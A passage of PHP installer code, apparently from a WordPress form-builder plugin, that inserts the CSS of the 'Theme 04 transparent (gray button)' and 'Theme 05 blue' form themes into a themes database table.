{\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #CCAAA3;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #8A6B63;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #8A6B63;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #CCAAA3;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #8A6B63;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 04 transparent (gray button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #FFFFFF;\r\nborder: 1px solid #A6A6A6;\r\nmargin-bottom: 10px;\r\ncolor: #A6A6A6;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #919191;\r\nbackground: #7A7A7A ;\r\nbackground: -moz-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -webkit-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -o-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -ms-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: linear-gradient(to bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #919191;\r\nbackground: #7A7A7A ;\r\nbackground: -moz-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -webkit-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -o-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -ms-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: linear-gradient(to bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/02/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\npadding: 5px;\r\n	text-align: center;\r\nfont-size: 16px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #63929E ;\r\nbackground: -moz-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -webkit-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -o-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -ms-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: linear-gradient(to bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #678B94;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #C0C0C0;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #A8A8A8;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #678B94;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #88B4BD;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #678B94;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 05 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #0E7297;\r\nborder: 1px solid #A0CBDB;\r\nmargin-bottom: 10px;\r\ncolor: #A0CBDB;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/01/nextbg_hover.png) url([SITE_ROOT]/images/05/01/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap 